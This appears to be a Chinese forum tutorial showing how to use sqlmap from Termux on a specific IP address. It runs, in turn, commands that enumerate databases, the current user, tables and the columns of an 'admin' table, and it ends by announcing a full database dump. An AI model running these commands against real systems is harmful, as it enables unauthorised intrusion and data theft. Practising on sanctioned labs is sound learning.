【梅开二度】sql注入
首先在termux里输入 sqlmap -u "http://59.63.200.79:8003/?id=1" --dbs 如图一 注dbs前是两个 -http://cdn.u1.huluxia.com/g4/M03/FF/DC/rBAAdl80bdKATjS-AARoABz6mR8006.jpg
注入的结果表示:
(1)注入参数id为GET注入,注入类型有四种,分别是:boolean-based blind/error-based/time-based blind/union quer
(2)数据库类型:MySQL
(3)画红圈的是网址所有的数据库名单http://cdn.u1.huluxia.com/g4/M03/FF/DC/rBAAdl80bdOAbQhVAARIACdk-Gw681.jpg
这时,我们发现这个网址存在注入,并且拿到了所有数据库名单。我们决定查看当前使用的数据库
sqlmap -u "http://59.63.200.79:8003/?id=1" --current-db
画出的就是当前使用使用的数据库:maoshe,一会儿我们对它下手
然后我们探测当前的数据库使用账户
sqlmap -u "http://59.63.200.79:8003/?id=1" --current-user如图三
可见当前的数据库使用账户为:maoshe@%
下面我们来探测maoshe这个数据库里的所有表http://cdn.u1.huluxia.com/g4/M03/FF/DC/rBAAdl80bdOAB-KlAARcAD0T4pg998.jpg
sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe --tables如图四
下面我们探测的是admin这个表的列
sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe --tables -T admin --columns 如图五
表中字段明显拿到了,下一步果断脱库!
页:
[1]